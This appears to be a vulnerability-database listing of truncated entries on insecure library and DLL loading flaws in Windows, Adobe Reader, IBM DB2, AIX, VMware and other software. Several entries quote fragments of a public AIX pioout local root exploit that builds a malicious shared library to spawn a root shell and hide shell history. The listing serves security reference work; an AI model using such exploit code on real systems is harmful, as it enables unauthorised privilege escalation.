MS KB2269637: Insecure Library Loading Could Allow Remote Code Execution

The remote host is missing Microsoft KB2264107 or an associated registry change, which provides a mechanism for mitigating binary planting or DLL preloading attacks. Insecurely implemented applications look in their current working directory when resolving DLL dependencies. If a malicious DLL wit...

acroread: multiple code execution flaws (APSB10-02)

The 3D implementation in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, might allow attackers to execute arbitrary code via unspecified vectors, related to a "DLL-loading vulnerability."...

No title provided

The core server component in PostgreSQL 8.4 before 8.4.1, 8.3 before 8.3.8, and 8.2 before 8.2.14 allows remote authenticated users to cause a denial of service backend shutdown by "re-LOAD-ing" libraries from a certain plugins directory...

Windows print spooler multiple security vulnerabilities

Buffer overflow, unauthorized files access, privilege escalation with dynamic library loading...

FreeBSD : cyrus-sasl -- dynamic library loading and set-user-ID applications (92268205-1947-11d9-bc4a-000c41e2cdad)

The Cyrus SASL library, libsasl, contains functions which may load dynamic libraries. These libraries may be loaded from the path specified by the environmental variable SASLPATH, which in some situations may be fully controlled by a local attacker. Thus, if a set-user-ID application such as chsh...

Ingres database server multiple security vulnerabilities

Weak file permissions, insecure shared library loading, buffer overflow in different utilities...

iDefense Security Advisory 06.04.08: VMware Multiple Products vmware-authd Untrusted Library Loading Vulnerability

iDefense Security Advisory 06.04.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 04, 2008 I. BACKGROUND VMware Inc. markets several virtualization products which allow multiple virtual computers to run on a single system. For more information visit the following URL...

iDefense Security Advisory 03.31.08: Macrovision InstallShield InstallScript One-Click Install Untrusted Library Loading Vulnerability

iDefense Security Advisory 03.31.08 http://labs.idefense.com/intelligence/vulnerabilities/ Mar 31, 2008 I. BACKGROUND Macrovision InstallShield InstallScript One-Click Install OCI is a web based installer technology that allows software publishers to distribute minimal installer packages which...

Adobe Acrobat / Reader multiple security vulnerabilities

Multiple buffer overflows and integer overflows, unsafe methods, unsafe dynamic library loading...

IBM DB2 database server multiple security vulnerabilities

TCP/523 remote administration service memory corruption. Dynamic livrary loading by relative path...

iDefense Security Advisory 02.07.08: IBM DB2 Universal Database db2pd Arbitrary Library Loading Vulnerability

iDefense Security Advisory 02.07.08 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 07, 2008 I. BACKGROUND IBM Corp.'s DB2 Universal Database product is a large database server product commonly used for high end databases. For more information, visit the following URL...

Adobe Reader < 7.1.0 / 8.1.2 Multiple Vulnerabilities

The version of Adobe Reader installed on the remote host is earlier than 8.1.2 or 7.1.0. Such versions are reportedly affected by multiple vulnerabilities : - A design error vulnerability may allow an attacker to gain control of a user's printer. - Multiple stack-based buffer overflows may allow ...

IBM DB2 database multiple security vulnerabilities

Directory traversal, buffer overflow, shared libraries loaded from insecure locations, files and directories manipulation...

IBM AIX &lt;= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit

No description provided by source. !/bin/sh 07/2007: public release echo "-------------------------------" echo " AIX pioout Local Root Exploit " echo " By qaaz" echo "-------------------------------" cat piolib.c EOF include stdlib.h include unistd.h void init attribute constructor; void init...

IBM AIX 5.3 SP6 - pioout Arbitrary Library Loading Privilege Escalation

IBM AIX 5.3 SP6 - pioout Arbitrary Library Loading Privilege Escalation !/bin/sh 07/2007: public release IBM AIX piolib.c include void init attribute constructor; void init seteuid0; setuid0; putenv"HISTFILE=/dev/null"; execl"/bin/bash", "bash", "-i", void 0; execl"/bin/sh", "sh", "-i", void 0;...

IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit

Exploit for aix platform in category local exploits ====================================================================== IBM AIX piolib.c include void init attribute constructor; void init seteuid0; setuid0; putenv"HISTFILE=/dev/null"; execl"/bin/bash", "bash", "-i", void 0; execl"/bin/sh", "sh...

IBM AIX utilities multiple security vulnerabilities

Multiple suid root ftp client buffer overflow, dynamic library loading via -R command line argument in pioout, buffer overflow with terminal control sequences in capture...

iDefense Security Advisory 07.26.07: IBM AIX pioout Arbitrary Library Loading Vulnerability

IBM AIX pioout Arbitrary Library Loading Vulnerability iDefense Security Advisory 07.26.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 26, 2007 I. BACKGROUND The pioout program is a setuid root application, installed by default under multiple versions of IBM AIX, that is used to...

IBM AIX 5.3 SP6 - &#039;pioout&#039; Arbitrary Library Loading Privilege Escalation

!/bin/sh 07/2007: public release IBM AIX piolib.c include void init attribute constructor; void init seteuid0; setuid0; putenv"HISTFILE=/dev/null"; execl"/bin/bash", "bash", "-i", void 0; execl"/bin/sh", "sh", "-i", void 0; perror"execl"; exit1; EOF gcc piolib.c -o piolib -shared -fPIC -r piolib ...

Kerio Webstar privilege escalation

Suid application loads library from current directory...